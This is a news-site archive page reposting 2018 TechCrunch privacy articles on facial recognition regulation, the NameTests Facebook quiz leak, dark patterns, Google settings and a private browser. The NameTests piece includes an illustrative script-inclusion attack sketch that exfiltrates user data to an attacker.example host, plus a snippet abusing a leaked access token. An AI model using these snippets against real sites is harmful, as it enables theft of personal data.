Timesdelhi.com

July 18, 2018
Category archive: privacy

As facial recognition technology becomes pervasive, Microsoft (yes, Microsoft) issues a call for regulation

in Artificial Intelligence/Delhi/facial recognition/Government/India/Microsoft/Opinion/Politics/privacy/TC

Technology companies have a privacy problem. They’re terribly good at invading ours and terribly negligent at protecting their own.

And with the push by technologists to map, identify and index our physical as well as virtual presence with biometrics like face and fingerprint scanning, the increasing digital surveillance of our physical world is prompting some of the companies that stand to benefit the most to call on government to provide guidelines on how they can use the incredibly powerful tools they’ve created.

That’s what’s behind today’s call from Microsoft President Brad Smith for government to start thinking about how to oversee the facial recognition technology that’s now at the disposal of companies like Microsoft, Google, Apple and government security and surveillance services across the country and around the world.

In what companies have framed as a quest to create “better,” more efficient and more targeted services for consumers, they have tried to solve the problem of user access by moving to increasingly passive (for the user) and intrusive (by the company) forms of identification — culminating in features like Apple’s Face ID and the frivolous filters that Snap overlays over users’ selfies.

Those same technologies are also being used by security and police forces in ways that have gotten technology companies into trouble with consumers or their own staff. Amazon has been called to task for its work with law enforcement, Microsoft’s own technologies have been used to help identify immigrants at the border (indirectly aiding in the separation of families and the virtual and physical lockdown of America against most forms of immigration) and Google faced an internal company revolt over the facial recognition work it was doing for the Pentagon.

Smith posits this nightmare scenario:

Imagine a government tracking everywhere you walked over the past month without your permission or knowledge. Imagine a database of everyone who attended a political rally that constitutes the very essence of free speech. Imagine the stores of a shopping mall using facial recognition to share information with each other about each shelf that you browse and product you buy, without asking you first. This has long been the stuff of science fiction and popular movies – like “Minority Report,” “Enemy of the State” and even “1984” – but now it’s on the verge of becoming possible.

What’s impressive about this is the intimation that it isn’t already happening (and that Microsoft isn’t enabling it). Across the world, governments are deploying these tools right now as ways to control their populations (the ubiquitous surveillance state that China has assembled, and is investing billions of dollars to upgrade, is just the most obvious example).

In this moment when corporate innovation and state power are merging in ways that consumers are only just beginning to fathom, executives who have to answer to a buying public are now pleading for government to set up some rails. Late capitalism is weird.

But Smith’s advice is prescient. Companies do need to get ahead of the havoc their innovations can wreak on the world, and they can look good while doing nothing by hiding their own abdication of responsibility on the issue behind the government’s.

“In a democratic republic, there is no substitute for decision making by our elected representatives regarding the issues that require the balancing of public safety with the essence of our democratic freedoms. Facial recognition will require the public and private sectors alike to step up – and to act,” Smith writes.

The fact is, something does, indeed, need to be done.

As Smith writes, “The more powerful the tool, the greater the benefit or damage it can cause. The last few months have brought this into stark relief when it comes to computer-assisted facial recognition – the ability of a computer to recognize people’s faces from a photo or through a camera. This technology can catalog your photos, help reunite families or potentially be misused and abused by private companies and public authorities alike.”

All of this takes on faith that the technology actually works as advertised. And the problem is, right now, it doesn’t.

In an op-ed earlier this month, Brian Brackeen, the chief executive of a startup working on facial recognition technologies, pulled back the curtain on the industry’s huge, not-so-secret problem.

Facial recognition technologies, used in the identification of suspects, negatively affect people of color. To deny this fact would be a lie.

And clearly, facial recognition-powered government surveillance is an extraordinary invasion of the privacy of all citizens — and a slippery slope to losing control of our identities altogether.

There’s really no “nice” way to acknowledge these things.

Smith himself admits that the technology has a long way to go before it’s perfect. But the implications of applying imperfect technologies are vast — and in the case of law enforcement, not academic. Designating an innocent bystander or civilian as a criminal suspect influences how police approach an individual.

Those instances, even if they amount to only a handful, would lead me to argue that these technologies have no business being deployed in security situations.

As Smith himself notes, “Even if biases are addressed and facial recognition systems operate in a manner deemed fair for all people, we will still face challenges with potential failures. Facial recognition, like many AI technologies, typically have some rate of error even when they operate in an unbiased way.”
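That error-rate caveat matters more than it might seem, because of base rates: scan enough faces and even a small error rate swamps the true matches. A back-of-the-envelope illustration (the numbers below are assumptions made for the sake of arithmetic, not figures from Smith’s post):

```latex
% Illustrative base-rate arithmetic (assumed numbers, not from Smith's post):
% a 1% false-positive rate, one million faces scanned, 100 genuine suspects.
\[
  \underbrace{10^{6} \times 0.01}_{\text{false positives}} = 10{,}000,
  \qquad
  \text{precision} \;\leq\; \frac{100}{100 + 10{,}000} \;\approx\; 1\%.
\]
```

On those assumed numbers, roughly 99 of every 100 people the system flags would be innocent, which is exactly the law enforcement scenario described above.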

While Smith lays out the problem effectively, he’s less clear on the solution. He’s called for a government “expert commission” to be empaneled as a first step on the road to eventual federal regulation.

That we’ve gotten here is an indication of how bad things actually are. It’s rare that a tech company has pleaded so nakedly for government intervention into an aspect of its business.

But here’s Smith writing, “We live in a nation of laws, and the government needs to play an important role in regulating facial recognition technology. As a general principle, it seems more sensible to ask an elected government to regulate companies than to ask unelected companies to regulate such a government.”

Given the current state of affairs in Washington, Smith may be asking too much. Which is why perhaps the most interesting — and admirable — call from Smith in his post is for technology companies to slow their roll.

“We recognize the importance of going more slowly when it comes to the deployment of the full range of facial recognition technology,” writes Smith. “Many information technologies, unlike something like pharmaceutical products, are distributed quickly and broadly to accelerate the pace of innovation and usage. ‘Move fast and break things’ became something of a mantra in Silicon Valley earlier this decade. But if we move too fast with facial recognition, we may find that people’s fundamental rights are being broken.”

News Source = techcrunch.com

Yet another massive Facebook fail: Quiz app leaked data on ~120M users for years

in Advertising Tech/Aleksandr Kogan/Cambridge Analytica/data breach/data misuse/Delhi/Europe/Facebook/India/Mark Zuckerberg/Policy/Politics/privacy/quiz apps/Security/Social/social media/vulnerability

Facebook knows the historical app audit it’s conducting in the wake of the Cambridge Analytica data misuse scandal is going to result in a tsunami of skeletons tumbling out of its closet.

It’s already suspended around 200 apps as a result of the audit — which remains ongoing, with no formal timeline announced for when the process (and any associated investigations that flow from it) will be concluded.

CEO Mark Zuckerberg announced the audit on March 21, writing then that the company would “investigate all apps that had access to large amounts of information before we changed our platform to dramatically reduce data access in 2014, and we will conduct a full audit of any app with suspicious activity”.

But you do have to question how much the audit exercise is, first and foremost, intended to function as PR damage limitation for Facebook’s brand — given the company’s relaxed response to a data abuse report concerning a quiz app with ~120M monthly users, which it received right in the midst of the Cambridge Analytica scandal.

Because despite Facebook being alerted about the risk posed by the leaky quiz apps in late April — via its own data abuse bug bounty program — they were still live on its platform a month later.

It took about a further month for the vulnerability to be fixed.

And, sure, Facebook was certainly busy over that period. Busy dealing with a major privacy scandal.

Perhaps the company was putting rather more effort into pumping out a steady stream of crisis PR — including taking out full page newspaper adverts (where it wrote that: “we have a responsibility to protect your information. If we can’t, we don’t deserve it”) — vs actually ‘locking down the platform’, per its repeated claims, even though the company’s long and rich privacy-hostile history suggests otherwise.

Let’s also not forget that, in early April, Facebook quietly confessed to a major security flaw of its own — when it admitted that an account search and recovery feature had been abused by “malicious actors” who, over what must have been a period of several years, had been able to surreptitiously collect personal data on a majority of Facebook’s ~2BN users — and use that intel for whatever they fancied.

So Facebook users already have plenty of reasons to doubt the company’s claims to be able to “protect your information”. But this latest data fail facepalm suggests it’s hardly scrambling to make amends for its own stinkingly bad legacy either.

Change will require regulation. And in Europe that has arrived, in the form of the GDPR.

Although it remains to be seen whether Facebook will face any data breach complaints in this specific instance, i.e. for not disclosing to affected users that their information was at risk of being exposed by the leaky quiz apps.

The regulation came into force on May 25 — and the javascript vulnerability was not fixed until June. So there may be grounds for concerned consumers to complain.

Which Facebook data abuse victim am I?

Writing in a Medium post, the security researcher who filed the report — self-styled “hacker” Inti De Ceukelaire — explains he went hunting for data abusers on Facebook’s platform after the company announced a data abuse bounty on April 10, as the company scrambled to present a responsible face to the world following revelations that a quiz app running on its platform had surreptitiously harvested millions of users’ data — data that had been passed to a controversial UK firm which intended to use it to target political ads at US voters.

De Ceukelaire says he began his search by noting down what third party apps his Facebook friends were using — finding that quizzes were among the most popular. Plus he already knew quizzes had a reputation for being data-suckers in a distracting wrapper. So he took his first ever Facebook quiz, from a brand called NameTests.com, and quickly realized the company was exposing Facebook users’ data to “any third-party that requested it”.

The issue was that NameTests was displaying the quiz taker’s personal data (such as full name, location, age, birthday) in a javascript file — thereby potentially exposing the identity and other data of logged-in Facebook users to any external website they happened to visit.
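To make the mechanics concrete, here is a minimal sketch of the cross-site script inclusion technique such a leak enables. Everything specific in it (the endpoint path, the global variable name, the attacker’s domain) is an invented assumption for illustration, not De Ceukelaire’s actual proof of concept:

```typescript
// Minimal sketch of a cross-site script inclusion (XSSI) leak of the kind
// described above. The same-origin policy stops a third-party page from
// reading a cross-origin fetch/XHR response, but <script> tags are exempt:
// the browser executes whatever the remote server returns, with the victim's
// cookies attached. If that response is JavaScript that assigns the
// logged-in user's data to a global variable, any page the victim visits
// can harvest it.

function harvestQuizData(): void {
  const script = document.createElement("script");
  // Hypothetical data endpoint; the victim's session cookie for the quiz
  // provider is sent along with this request automatically.
  script.src = "https://quiz-provider.example.com/appconfig_user";
  script.onload = () => {
    // The executed response has populated a global with personal data.
    const leaked = (window as any).user_data;
    if (leaked) {
      // Exfiltrate it to the attacker's own server.
      void fetch("https://attacker.example.com/collect", {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify(leaked),
      });
    }
  };
  document.head.appendChild(script);
}

harvestQuizData();
```

Note that the whole attack needs nothing from the victim beyond visiting a page while logged in.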

He also found the javascript was exposing an access token that could grant third party websites even more expansive data access permissions — such as to users’ Facebook posts, photos and friends.
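A leaked token of that kind is trivially easy to exercise. A hedged sketch, assuming an attacker has captured a token carrying those permissions (the token value is obviously fake, and which fields actually come back depends on the scopes the quiz app held):

```typescript
// Sketch: exercising a leaked access token against Facebook's Graph API.
// The field list is illustrative; real availability depends on token scope.
const leakedToken = "EAAB...captured-elsewhere"; // e.g. via a leak like the one above

async function pullProfile(): Promise<void> {
  const resp = await fetch(
    "https://graph.facebook.com/me" +
      "?fields=id,name,posts,photos,friends" +
      `&access_token=${encodeURIComponent(leakedToken)}`
  );
  const profile = await resp.json();
  console.log(profile); // whatever the token's scope allows: posts, photos, friends...
}

void pullProfile();
```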

It’s not clear exactly why NameTests was handling user data this way — but it presumably relates to the quiz app company’s own ad targeting activities. (Its privacy policy states: “We work together with various technological partners who, for example, display advertisements on the basis of user data. We make sure that the user’s data is pseudonymised (e.g. no clear data such as names or e-mail addresses) and that users have simple rights of revocation at their disposal. We also conclude special data protection agreements with our partners, in which they commit themselves to the protection of user data.” — which sounds great until you realize its javascript was just leaking people’s personally identifiable data… [facepalm])

“Depending on what quizzes you took, the javascript could leak your facebook ID, first name, last name, language, gender, date of birth, profile picture, cover photo, currency, devices you use, when your information was last updated, your posts and statuses, your photos and your friends,” writes De Ceukelaire.

He reckons people’s data had been publicly exposed since at least the end of 2016.

On Facebook, NameTests describes its purpose thusly: “Our goal is simple: To make people smile!” — adding that its quizzes are intended as a bit of “fun”.

It doesn’t shout so loudly that the ‘price’ for taking one of its quizzes, say to find out what Disney princess you ‘are’ or what you could look like as an oil painting, is not only that it will suck masses of your personal data (and potentially your friends’ data) out of Facebook’s platform for its own ad targeting purposes, but also, until recently, that your and other people’s information could have been exposed to goodness knows who, for goodness knows what nefarious purposes…

The Facebook-Cambridge Analytica data misuse scandal has underlined that ostensibly frivolous social data can end up being repurposed for all sorts of manipulative and power-grabbing purposes. (And not only can it end up that way: quizzes are often deliberately built to be data-harvesting tools… So think of that the next time you get a ‘take this quiz’ notification asking ‘what is in your fact file?’ or ‘what has your date of birth imprinted on you?’. And hope ads are all you’re being targeted with…)

De Ceukelaire found that NameTests would still reveal Facebook users’ identity even after its app was deleted.

“In order to prevent this from happening, the user would have had to manually delete the cookies on their device, since NameTests.com does not offer a log out functionality,” he writes.

“I would imagine you wouldn’t want any website to know who you are, let alone steal your information or photos. Abusing this flaw, advertisers could have targeted (political) ads based on your Facebook posts and friends. More explicit websites could have abused this flaw to blackmail their visitors, threatening to leak your sneaky search history to your friends,” he adds, fleshing out the risks for affected Facebook users.

As well as alerting Facebook to the vulnerability, De Ceukelaire says he contacted NameTests — and they claimed to have found no evidence of abuse by a third party. They also said they would make changes to fix the issue.

We’ve reached out to NameTests’ parent company — a German firm called Social Sweethearts — for comment. Its website touts a “data-driven approach” — and claims its portfolio of products achieve “a global organic reach of several billion page views per month”.

After De Ceukelaire reported the problem to Facebook, he says he received an initial response from the company on April 30 saying they were looking into it. Then, hearing nothing for some weeks, he sent a follow up email, on May 14, asking whether they had contacted the app developers.

A week later Facebook replied saying it could take three to six months to investigate the issue (i.e. the same timeframe mentioned in their initial automated reply), adding they would keep him in the loop.

Yet at that time — which was a month after his original report — the leaky NameTests quizzes were still up and running, meaning Facebook users’ data was still being exposed and at risk. And Facebook knew about the risk.

The next development came on June 25, when De Ceukelaire says he noticed NameTests had changed the way they process data to close down the access they had been exposing to third parties.

Two days later Facebook also confirmed the flaw in writing, admitting: “[T]his could have allowed an attacker to determine the details of a logged-in user to Facebook’s platform.”

It also told him it had confirmed with NameTests the issue had been fixed. And its apps continue to be available on Facebook’s platform — suggesting Facebook did not find the kind of suspicious activity that has led it to suspend other third party apps. (At least, assuming it conducted an investigation.)

Facebook paid out a $4,000 bounty under the terms of its data abuse bug bounty program, doubled to $8,000 because, per De Ceukelaire’s request, it was donated to a charity.

We asked Facebook what took it so long to respond to the data abuse report, especially given the issue was so topical when De Ceukelaire filed it. But Facebook declined to answer specific questions.

Instead it sent us the following statement, attributed to Ime Archibong, its VP of product partnerships:

A researcher brought the issue with the nametests.com website to our attention through our Data Abuse Bounty Program that we launched in April to encourage reports involving Facebook data. We worked with nametests.com to resolve the vulnerability on their website, which was completed in June.

Facebook also claims it received De Ceukelaire’s report on April 27, rather than April 22, as he recounts it. Though it’s possible the former date is when Facebook’s own staff retrieved the report from its systems. 

Beyond displaying a disturbingly relaxed attitude to other people’s privacy — which risks getting Facebook into regulatory trouble, given GDPR’s strict requirements around breach disclosure, for example — the other core issue of concern here is the company’s apparent failure to enforce its own developer policy. 

The underlying issue is whether or not Facebook performs any checks on apps running on its platform. It’s no good having T&Cs if you don’t have any active processes to enforce them. Rules without enforcement aren’t worth the paper they’re written on.

Historical evidence suggests Facebook did not actively enforce its developer T&Cs — even if it’s now “locking down the platform”, as it claims, as a result of so many privacy scandals. 

The quiz app developer at the center of the Cambridge Analytica scandal, Aleksandr Kogan — who harvested and sold/passed Facebook user data to third parties — has accused Facebook of essentially not having a policy. He contends it is therefore Facebook that is responsible for the massive data abuses that have played out on its platform — only a portion of which have so far come to light.

Fresh examples such as NameTests’ leaky quiz apps merely bolster the case Kogan made for Facebook being the guilty party where data misuse is concerned. After all, if you built some stables without any doors at all, would you really blame your horses for bolting?

News Source = techcrunch.com

Study calls out ‘dark patterns’ in Facebook and Google that push users towards less privacy

in Delhi/Facebook/GDPR/Google/India/Microsoft/Politics/privacy/Social

More scrutiny than ever is in place on the tech industry, and while high-profile cases like Mark Zuckerberg’s appearance in front of lawmakers garner headlines, there are subtler forces at work. This study from a Norwegian watchdog group eloquently and painstakingly describes the ways that companies like Facebook and Google push their users towards making choices that negatively affect their own privacy.

It was spurred, like many other new inquiries, by Europe’s GDPR, which has caused no small amount of consternation among companies for whom collecting and leveraging user data is their main source of income.

The report (PDF) goes into detail on exactly how these companies create an illusion of control over your data while simultaneously nudging you towards making choices that limit that control.

Although the companies and their products will be quick to point out that they are in compliance with the requirements of the GDPR, there are still plenty of ways in which they can be consumer-unfriendly.

In going through a set of privacy popups put out in May by Facebook, Google, and Microsoft, the researchers found that the first two especially feature “dark patterns, techniques and features of interface design meant to manipulate users…used to nudge users towards privacy intrusive options.”

Flowchart illustrating the Facebook privacy options process – the green boxes are the “easy” route.

It’s not big obvious things — in fact, that’s the point of these “dark patterns”: that they are small and subtle yet effective ways of guiding people towards the outcome preferred by the designers.

For instance, in Facebook and Google’s privacy settings process, the more private options are simply disabled by default, and users not paying close attention will not know that there was a choice to begin with. You’re always opting out of things, not in. To enable these options is also a considerably longer process: 13 clicks or taps versus 4 in Facebook’s case.
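As a purely illustrative sketch of that default-on pattern (the option names below are invented, not Facebook’s or Google’s actual settings schema):

```typescript
// Illustrative only: the "dark pattern" the report describes boils down to
// shipping every data-sharing option enabled, so that doing nothing means
// sharing everything.
interface PrivacySettings {
  faceRecognition: boolean;
  adTargetingFromActivity: boolean;
  shareDataWithPartners: boolean;
}

// Out-of-the-box state: the user must find and disable each option,
// click by click, to claw back privacy.
const shippedDefaults: PrivacySettings = {
  faceRecognition: true,
  adTargetingFromActivity: true,
  shareDataWithPartners: true,
};

// A privacy-by-default design (the direction GDPR Article 25 points in)
// would invert the flags and ask users to opt in instead.
const privacyFirstDefaults: PrivacySettings = {
  faceRecognition: false,
  adTargetingFromActivity: false,
  shareDataWithPartners: false,
};
```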

That’s especially troubling when the companies are also forcing this action to take place at a time of their choosing, not yours. And Facebook added a cherry on top, almost literally, with the fake red dots that appeared behind the privacy popup, suggesting users had messages and notifications waiting for them even if that wasn’t the case.

When choosing the privacy-enhancing option, such as disabling face recognition, users are presented with a tailored set of consequences: “we won’t be able to use this technology if a stranger uses your photo to impersonate you,” for instance, to scare the user into enabling it. But nothing is said about what you will be opting into, such as how your likeness could be used in ad targeting or automatically matched to photos taken by others.

Disabling ad targeting on Google, meanwhile, warns you that you will not be able to mute some ads going forward. People who don’t understand the mechanism of muting being referred to here will be scared of the possibility — what if an ad pops up at work or during a show and I can’t mute it? So they agree to share their data.

Before you make a choice, you have to hear Facebook’s case.

In this way users are punished for choosing privacy over sharing, and are always presented only with a carefully curated set of pros and cons intended to cue the user to decide in favor of sharing. “You’re in control,” the user is constantly told, though those controls are deliberately designed to undermine what control you do have and exert.

Microsoft, while guilty of some of the same biased phrasing, received much better marks in the report. Its privacy setup process put the less and more private options right next to each other, presenting them as equally valid choices rather than some tedious configuration tool that might break something if you’re not careful. Subtle cues do push users towards sharing more data or enabling voice recognition, but users aren’t punished or deceived the way they are elsewhere.

You may already have been aware of some of these tactics, as I was, but it makes for interesting reading nevertheless. We tend to discount these things when it’s just one screen here or there, but seeing them all together along with a calm explanation of why they are the way they are makes it rather obvious that there’s something insidious at play here.

News Source = techcrunch.com

Google adds a search feature to account settings to ease use

in Advertising Tech/Delhi/India/Policy/Politics/privacy/Security/TC

Google has announced a refresh of the Google Accounts user interface. The changes are intended to make it easier for users to navigate settings and review data the company has associated with an account — including information relating to devices, payment methods, purchases, subscriptions, reservations, contacts and other personal info.

The update also makes security and privacy options more prominent, according to Google.

“To help you better understand and take control of your Google Account, we’ve made all your privacy options easy to review with our new intuitive, user-tested design,” it writes. “You can now more easily find your Activity controls in the Data & Personalization tab and choose what types of activity data are saved in your account to make Google work better for you.

“There, you’ll also find the recently updated Privacy Checkup that helps you review your privacy settings and explains how they shape your experience across Google services.”

Android users will get the refreshed Google Account interface first, with iOS and web coming later this year.

Last September the company also refreshed Google Dashboard — to make it easier to use and better integrate it into other privacy controls.

While in October it outed a revamped Security Checkup feature, offering an overview of account security that includes personalized recommendations. The same month it also launched a free, opt-in program aimed at users who believe their accounts to be at particularly high risk of targeted online attacks.

And in January it announced new ad settings controls, also billed as boosting transparency and control. So settings related updates have been coming pretty thick and fast from the ad targeting tech giant.

The latest refresh comes at a time when many companies have been rethinking their approach to security and privacy as a result of a major update to the European Union’s data protection framework which applies to entities processing EU people’s data regardless of where that data is being crunched.

Google also announced a raft of changes to its privacy policy as a direct compliance response with GDPR back in May — saying it was making the policy clearer and easier to navigate, and adding more detail and explanations. It also updated user controls at that time, simplifying on/off switches for things like location data collection and web and app activity.

So that legal imperative to increase visibility and user controls at the core of digital empires looks to be generating uplift that’s helping to raise the settings bar across entire product suites. Which is good news for users.

As well as rethinking how Google Account settings are laid out, the updated “experience” adds some new functions intended to make it easier for people to find the settings they’re looking for too.

Notably a new search functionality for locating settings or specific info within an account — such as how to change a password. Which sounds like a really handy addition. There’s also a new dedicated support section offering help with common tasks, and answers from community experts.

And while it’s certainly welcome to see a search expert like Google adding a search feature to help people gain more control over their personal data, you do have to wonder what took it so long to come up with that idea.

Controls are only as useful as they are easy to use, of course. And offering impenetrable and/or bafflingly complex settings has, shamefully, been the historical playbook of the tech industry — as a socially engineered pathway to maximize data gathering via obfuscation (and obtain consent by confusion).

Again, the GDPR makes egregious personal data heists untenable over the long term — at least where the regulation has jurisdiction.

And while built-in opacity around technology system operation is something regulators are really only beginning to get to grips with — and much important work remains to be done to put vital guardrails in place, such as around the use of personal data for political ad targeting, for instance, or to ensure AI blackboxes can’t bake in bias — several major privacy scandals have knocked the sheen off big tech’s algorithmic pandora’s boxes in recent years. And politicians are leaning into the techlash.

So, much like all these freshly redesigned settings menus, the direction of regulatory travel looks pretty clear — even if the pace of progress is never as disruptive as the technologies themselves.

News Source = techcrunch.com

Keepsafe launches a privacy-focused mobile browser

in Apps/Delhi/India/Keepsafe/mobile/Politics/privacy/Startups

Keepsafe, the company behind the private photo app of the same name, is expanding its product lineup today with the release of a mobile web browser.

Co-founder and CEO Zouhair Belkoura argued that all of Keepsafe’s products (which also include a VPN app and a private phone number generator) are united not just by a focus on privacy, but by a determination to make those features simple and easy-to-understand — in contrast to what Belkoura described as “how security is designed in techland,” with lots of jargon and complicated settings.

Plus, when it comes to your online activity, Belkoura said there are different levels of privacy. There’s the question of the government and large tech companies accessing our personal data, which he argued people care about intellectually, but “they don’t really care about it emotionally.”

Then there’s “the nosy neighbor problem,” which Belkoura suggested is something people feel more strongly about: “A billion people are using Gmail and it’s scanning all their email [for advertising], but if I were to walk up to you and say, ‘Hey, can I read your email?’ you’d be like, ‘No, that’s kind of weird, go away.’ ”

It looks like Keepsafe is trying to tackle both kinds of privacy with its browser. For one thing, you can lock the browser with a PIN (it also supports Touch ID, Face ID and Android Fingerprint).

Then once you’re actually browsing, you can do it in normal tabs, where social, advertising and analytics trackers are blocked (you can toggle which kinds of trackers are affected) but cookies and caching are still allowed — so you stay logged in to websites, and other session data is retained. Or, if you want an additional layer of privacy, you can open a private tab, where everything gets forgotten as soon as you close it.
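For the curious, here is a minimal sketch of how that kind of category-toggled tracker blocking can work. The category names and domain lists are assumptions for illustration, not Keepsafe’s actual implementation (real blockers ship curated lists):

```typescript
// Minimal sketch of category-based tracker blocking with per-category
// user toggles, as the browser described above exposes.

type TrackerCategory = "social" | "advertising" | "analytics";

// Illustrative blocklist; real products use curated, regularly updated lists.
const trackerDomains: Record<TrackerCategory, string[]> = {
  social: ["connect.facebook.net"],
  advertising: ["doubleclick.net"],
  analytics: ["google-analytics.com"],
};

// User-facing toggles: each tracker category can be switched on or off.
const blockingEnabled: Record<TrackerCategory, boolean> = {
  social: true,
  advertising: true,
  analytics: true,
};

function shouldBlock(requestUrl: string): boolean {
  const host = new URL(requestUrl).hostname;
  return (Object.keys(trackerDomains) as TrackerCategory[]).some(
    (category) =>
      blockingEnabled[category] &&
      trackerDomains[category].some(
        (domain) => host === domain || host.endsWith("." + domain)
      )
  );
}

// Example: a page requests an analytics script; the browser drops it.
console.log(shouldBlock("https://www.google-analytics.com/analytics.js")); // true
```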

While you can get some of these protections just by turning on private/incognito mode in a regular browser, Belkoura said there’s a clarity for consumers when an app is designed specifically for privacy, and the app is part of a broader suite of privacy-focused products. In addition, he said he’s hoping to build meaningful integrations between the different Keepsafe products.

Keepsafe Browser is available for free on iOS and Android.

When asked about monetization, Belkoura said, “I don’t think that the private browser per se is a good place to directly monetize … I’m more interested in saying this is part of the Keepsafe suite and there are other parts of the Keepsafe Suite that we’ll charge you money for.”

News Source = techcrunch.com
